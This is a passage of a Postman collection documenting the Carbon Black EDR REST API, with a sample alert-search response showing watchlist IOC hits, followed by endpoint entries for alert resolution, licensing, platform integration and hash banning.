           \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"198.60.22.13\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/address.xhtml?address=198.60.22.13&owner=Carbon+Black\",\n            \"_version_\": 1654749449132441600,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"198.60.22.13\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"03c2572e-9b3f-45c3-9249-ffc39eb80fe3\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 77,\n            \"watchlist_id\": \"tc-104256558\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:07.928Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"dns\",\n            \"watchlist_name\": \"tc-104256558\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50513\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30188\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50513\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 51.975,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"mirrors.xmission.com\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/host.xhtml?host=mirrors.xmission.com&owner=Carbon+Black\",\n            \"_version_\": 1654749449133490176,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"mirrors.xmission.com\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"8a2b706a-7c69-41ad-8550-f23f75ddaa17\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 89,\n            \"watchlist_id\": \"tc-104256559\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.003Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"ipv4\",\n            \"watchlist_name\": \"tc-104256559\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50514\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30380\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50514\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 60.075,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"198.60.22.13\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/address.xhtml?address=198.60.22.13&owner=Carbon+Black\",\n            \"_version_\": 1654749449134538752,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"198.60.22.13\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"d74145ef-76bb-4f3a-97b9-95fc5caeb370\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 77,\n            \"watchlist_id\": \"tc-104256558\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.012Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"dns\",\n            \"watchlist_name\": \"tc-104256558\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50514\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30380\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50514\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 51.975,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"mirrors.xmission.com\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/host.xhtml?host=mirrors.xmission.com&owner=Carbon+Black\",\n            \"_version_\": 1654749449134538753,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"mirrors.xmission.com\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"90e49500-39eb-455f-9c01-c9e1fc661f29\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 89,\n            \"watchlist_id\": \"tc-104256559\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.032Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"ipv4\",\n            \"watchlist_name\": \"tc-104256559\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50523\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30446\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50523\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 60.075,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"198.60.22.13\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/address.xhtml?address=198.60.22.13&owner=Carbon+Black\",\n            \"_version_\": 1654749449135587328,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"198.60.22.13\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"7cac5b8c-ec38-4e59-aaa7-acbd3fed4fe5\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 77,\n            \"watchlist_id\": \"tc-104256558\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.045Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"dns\",\n            \"watchlist_name\": \"tc-104256558\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50523\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30446\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50523\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 51.975,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"mirrors.xmission.com\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/host.xhtml?host=mirrors.xmission.com&owner=Carbon+Black\",\n            \"_version_\": 1654749449139781632,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"mirrors.xmission.com\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"219a5949-5da9-4c89-88b4-f50639809a76\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 89,\n            \"watchlist_id\": \"tc-104256559\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.061Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"ipv4\",\n            \"watchlist_name\": \"tc-104256559\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50524\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30274\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50524\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 60.075,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"198.60.22.13\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/address.xhtml?address=198.60.22.13&owner=Carbon+Black\",\n            \"_version_\": 1654749449139781633,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"198.60.22.13\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"88e039a6-fbca-4447-96ca-6419761e5b91\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 77,\n            \"watchlist_id\": \"tc-104256558\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:08.075Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"dns\",\n            \"watchlist_name\": \"tc-104256558\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50524\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30274\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50524\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 51.975,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n            \"status\": \"Unresolved\",\n            \"process_path\": \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder\\\\setup-x86_64.exe\",\n            \"description\": \"mirrors.xmission.com\",\n            \"process_name\": \"setup-x86_64.exe\",\n            \"process_unique_id\": \"00000002-0000-1740-01d5-c28986c1ce63-016f6d9daa92\",\n            \"process_id\": \"00000002-0000-1740-01d5-c28986c1ce63\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/host.xhtml?host=mirrors.xmission.com&owner=Carbon+Black\",\n            \"_version_\": 1654749449140830208,\n            \"regmod_count\": 1,\n            \"md5\": \"ebf71ebf6c671238bcb023b91d25971c\",\n            \"sha256\": \"ae481452927771af871e218c85252192e1448c48fbc54bfe38c1bd2303af4ad0\",\n            \"segment_id\": 1578092046994,\n            \"total_hosts\": 0,\n            \"feed_id\": 107,\n            \"ioc_value\": \"mirrors.xmission.com\",\n            \"os_type\": \"windows\",\n            \"childproc_count\": 0,\n            \"unique_id\": \"2ecb4914-dce6-4513-814e-7b5ef0db8498\",\n            \"feed_rating\": 3\n        }\n    ],\n    \"elapsed\": 0.16867995262145996,\n    \"comprehensive_search\": true,\n    \"all_segments\": true,\n    \"total_results\": 218,\n    \"highlights\": [],\n    \"facets\": {\n        \"status\": [\n            {\n                \"percent\": 0,\n                \"ratio\": \"0.0\",\n                \"name\": \"In Progress\",\n                \"value\": 0\n            },\n            {\n                \"percent\": 0,\n                \"ratio\": \"0.0\",\n                \"name\": \"Resolved\",\n                \"value\": 0\n            },\n            {\n                \"ratio\": \"100.0\",\n                \"percent\": 100,\n                \"name\": \"Unresolved\",\n                \"value\": 218\n            },\n            {\n                \"percent\": 0,\n                \"ratio\": \"0.0\",\n                \"name\": \"False Positive\",\n                \"value\": 0\n            }\n        ],\n        \"username\": [\n            {\n                \"ratio\": \"100.0\",\n                \"percent\": 100,\n                \"name\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n                \"value\": 180\n            }\n        ],\n        \"ioc_value_facet\": [\n            {\n                \"ratio\": \"40.4\",\n                \"percent\": 100,\n                \"name\": \"198.60.22.13\",\n                \"value\": 88\n            },\n            {\n                \"ratio\": \"40.4\",\n                \"percent\": 100,\n                \"name\": \"mirrors.xmission.com\",\n                \"value\": 88\n            },\n            {\n                \"ratio\": \"17.4\",\n                \"percent\": 43,\n                \"name\": \"EBF71EBF6C671238BCB023B91D25971C\",\n                \"value\": 38\n            },\n            {\n                \"ratio\": \"1.8\",\n                \"percent\": 4,\n                \"name\": \"ebf71ebf6c671238bcb023b91d25971c\",\n                \"value\": 4\n            }\n        ],\n        \"group\": [\n            {\n                \"ratio\": \"100.0\",\n                \"percent\": 100,\n                \"name\": \"default group\",\n                \"value\": 180\n            }\n        ],\n        \"feed_category\": [],\n        \"hostname\": [\n            {\n                \"ratio\": \"82.6\",\n                \"percent\": 100,\n                \"name\": \"desktop-h8ogj26\",\n                \"value\": 180\n            },\n            {\n                \"ratio\": \"17.4\",\n                \"percent\": 21,\n                \"name\": \"desktop-s5bo5mf\",\n                \"value\": 38\n            }\n        ],\n        \"feed_name\": [\n            {\n                \"ratio\": \"100.0\",\n                \"percent\": 100,\n                \"name\": \"carbonblack\",\n                \"value\": 218\n            }\n        ],\n        \"assigned_to\": [],\n        \"watchlist_name\": [\n            {\n                \"ratio\": \"40.4\",\n                \"percent\": 100,\n                \"name\": \"tc-104256558\",\n                \"value\": 88\n            },\n            {\n                \"ratio\": \"40.4\",\n                \"percent\": 100,\n                \"name\": \"tc-104256559\",\n                \"value\": 88\n            },\n            {\n                \"ratio\": \"19.3\",\n                \"percent\": 47,\n                \"name\": \"tc-95785979\",\n                \"value\": 42\n            }\n        ]\n    },\n    \"start\": 0,\n    \"incomplete_results\": false,\n    \"filtered\": {\n        \"status\": [],\n        \"username\": [],\n        \"ioc_value_facet\": [],\n        \"group\": [],\n        \"feed_category\": [],\n        \"hostname\": [],\n        \"feed_name\": [],\n        \"assigned_to\": [],\n        \"watchlist_name\": []\n    }\n}"}],"_postman_id":"f80ff1a1-882f-49de-ba2a-385c6f892524"},{"name":"Update/Resolve Alerts","id":"462ed6a8-5326-4773-b270-3b5176630144","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/alert/{{cb_alert_id}}?unique_id=&status=","description":"<p>Alert update and resolution</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#update-resolve-alerts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","alert","{{cb_alert_id}}"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>[REQUIRED] Unique ID of alert to update</p>\n","type":"text/plain"},"key":"unique_id","value":""},{"description":{"content":"<p>[REQUIRED] Status of the alert, as a string</p>\n","type":"text/plain"},"key":"status","value":""}],"variable":[]}},"response":[],"_postman_id":"462ed6a8-5326-4773-b270-3b5176630144"},{"name":"Bulk Update Alerts","id":"6ec48803-568d-4b34-bc2d-7881af2d9267","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/javascript","type":"text"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"cb.urlver=1&cb.fq.status=unresolved&sort=alert_severity%20desc&rows=10\",\n  \"alert_ids\": [\"id1\", \"id2\"],\n  \"requested_status\": \"Resolved\",\n  \"set_ignored\": true,\n  \"assigned_to\": \"ahnold\"\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/v1/alerts","description":"<p>Updating alerts require an API key with Global Administrator privileges. Multiple alerts can be updated in bulk using the same call.</p>\n<p>The only property that can be modified in a threat report is the <code>is_ignored</code> property. By setting <code>is_ignored</code> to <code>True</code> for a threat report, any further hits on IOCs contained within that report will no longer trigger an Alert.</p>\n<h4 id=\"payload\">Payload</h4>\n<p>To modify multiple alerts at once, either specify the list of Alert IDs in the ids dictionary, or submit a query (using the URL-encoded version of the query string) in the <code>query</code> string.</p>\n<p>Specify the operation to perform by using either the <code>set_ignored</code>, <code>requested_status</code>, or <code>assigned_to</code> keys. If the <code>assigned_to</code> key is present, then the <code>requested_status</code> should be provided as well.</p>\n<p>The possible values for <code>requested_status</code> are <code>Resolved</code>, <code>Unresolved</code>, <code>In Progress</code>, or <code>False Positive</code>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#bulk-update-alerts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","alerts"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6ec48803-568d-4b34-bc2d-7881af2d9267"}],"id":"8ea5f182-c1f8-433a-829f-3096e45de20e","_postman_id":"8ea5f182-c1f8-433a-829f-3096e45de20e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Administrative APIs","item":[{"name":"Server License","id":"b668c253-b125-44dc-9e7d-be4bc8e4a9b1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/license","description":"<p>License status and application</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#server-license\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","license"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b668c253-b125-44dc-9e7d-be4bc8e4a9b1"},{"name":"Server License","id":"35c2988c-0761-4f7b-903a-933f36bcfe0e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/license","description":"<p>License status and application</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#server-license\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","license"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"35c2988c-0761-4f7b-903a-933f36bcfe0e"},{"name":"CB Enterprise Protection Integration","id":"fcf32675-bfe3-4d98-a5b1-781f307a23af","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/settings/global/platformserver","description":"<p>Get and set the configuration details of the Carbon Black Enterprise Protection server.\nThese details are used for CB Enterprise Response Server integration with the CB Enterprise Protection Server.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#cb-enterprise-protection-integration\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","settings","global","platformserver"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"fcf32675-bfe3-4d98-a5b1-781f307a23af"},{"name":"CB Enterprise Protection Integration","id":"08b560d1-82c8-4024-9b14-add57fc046b1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/settings/global/platformserver","description":"<p>Get and set the configuration details of the Carbon Black Enterprise Protection server.\nThese details are used for CB Enterprise Response Server integration with the CB Enterprise Protection Server.</p>\n<p>A <code>POST</code> accepts a JSON dictionary with one or more keys as defined below.</p>\n<ul>\n<li><code>server_url</code>: OPTIONAL the base server IP or DNS name. The protocol and the URI are not included.</li>\n<li><code>ssl_certificate_verify</code>: OPTIONAL indication as to if Carbon Black server should verify the Platform Server SSL certificate; valid values are ‘true’ and ‘false’</li>\n<li><code>watchlist_export</code>: OPTIONAL indication as to if the Carbon Black server should export, via HTTPS POST, watchlist hits to the Platfrom Server; valid values are ‘true’ and ‘false’</li>\n<li><code>auth_toke</code>: OPTIONAL authorization token used by the Carbon Black server to authenticate against the Platform Server.</li>\n</ul>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#cb-enterprise-protection-integration\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","settings","global","platformserver"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"08b560d1-82c8-4024-9b14-add57fc046b1"}],"id":"488cc73f-cf18-45d8-97b9-1354a3f5db22","_postman_id":"488cc73f-cf18-45d8-97b9-1354a3f5db22","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Banning","item":[{"name":"Ban Binary by Hash","id":"1dbfe899-65f2-4b5b-8aef-4fbb3cfd767c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/banning/blacklist","description":"<p>Blacklist (Ban) a specified md5 hash</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB 